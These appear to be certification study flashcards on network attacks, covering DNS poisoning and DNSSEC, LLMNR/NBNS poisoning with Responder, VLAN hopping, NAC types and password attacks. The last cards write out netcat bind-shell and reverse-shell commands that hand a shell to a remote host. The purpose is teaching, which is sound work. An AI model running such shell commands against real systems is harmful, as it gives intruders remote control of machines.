Section 9: Network Attacks Flashcards
How to prevent DNS Poisoning
Use DNSSEC
● DNS Security Extensions (DNSSEC)
o Uses digital signatures based on public-key cryptography
to ensure DNS data is digitally signed by the owner
o The zone owner and the resolvers need to configure their
DNS servers to support DNSSEC
LLMNR
Based on the DNS packet formatting and allows both IPv4 and IPv6 hosts to perform name resolution on the host if they are on the same local link
Both hosts need to be on the same LAN to use this protocol, this is used in place of a DNS server.
This is only on windows
NBNS
o NetBIOS Name Service (NBNS or NBT-NS)
▪ Part of the NetBIOS-over-TCP protocol suite that is used as a type of name resolution inside the internal network to translate internal names to IP addresses
▪ NBT-NS uses the host name of a system for its resolution
o By default, Windows machines will first attempt to use LLMNR and then attempt to use NBT-NS
Tool: Responder
A command-line tool in Kali Linux that is used to poison NetBIOS, LLMNR, and mDNS name resolution requests
VLAN Hopping Methods
Double Tagging
Switch Spoofing
MAC Table Overflow Attack
Types of NAC Solutions
Persistent
● A piece of software installed on a device requesting access to the network
Non-persistent
● Requires the users to connect to the network and log in to a web-based captive portal to download an agent that scans their
devices for compliance
Agentless NAC/Volatile Agent
● Installs the scanning engine on the domain controller instead of
the endpoint device
Rainbow Table
A precomputed hash value table that contains known passwords used for offline password cracking
Password Spraying
Uses a dictionary of common passwords on multiple accounts to bypass authentication mechanisms
Credential Stuffing
Tests stolen user account names and passwords against multiple
websites
netcat command to set up bind shell (forward shell)
nc -l -p 443 -e cmd.exe
nc -lp 443 -e /bin/sh
netcat command to set up reverse shell
Set Up Listener (attacker device)
● nc -l -p 443
▪ Connect to Listener (victim device)
● nc 10.1.0.2 443 -e cmd.exe